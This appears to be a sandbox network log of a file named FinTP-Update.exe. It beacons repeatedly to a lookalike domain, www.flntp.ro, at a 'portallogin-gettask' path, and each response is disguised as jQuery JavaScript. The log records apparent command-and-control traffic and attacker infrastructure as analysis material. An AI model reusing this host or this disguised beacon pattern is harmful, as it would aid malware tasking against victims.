                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:26 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:25 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:26 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.5497253.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:27 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:28 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:28 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:28 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.5497313.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:30 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:30 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:30 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:30 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.5497383.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:32 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:33 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:32 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:33 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.5497443.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:34 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:35 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:35 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:35 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.5497503.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:36 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:37 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:37 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:37 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.5497563.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:39 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:39 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:39 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:39 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.5497623.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:41 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:42 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:41 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:42 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.5497683.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:43 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:44 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:44 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:44 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.5497733.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:45 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:46 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:46 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:46 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.5497803.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:47 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
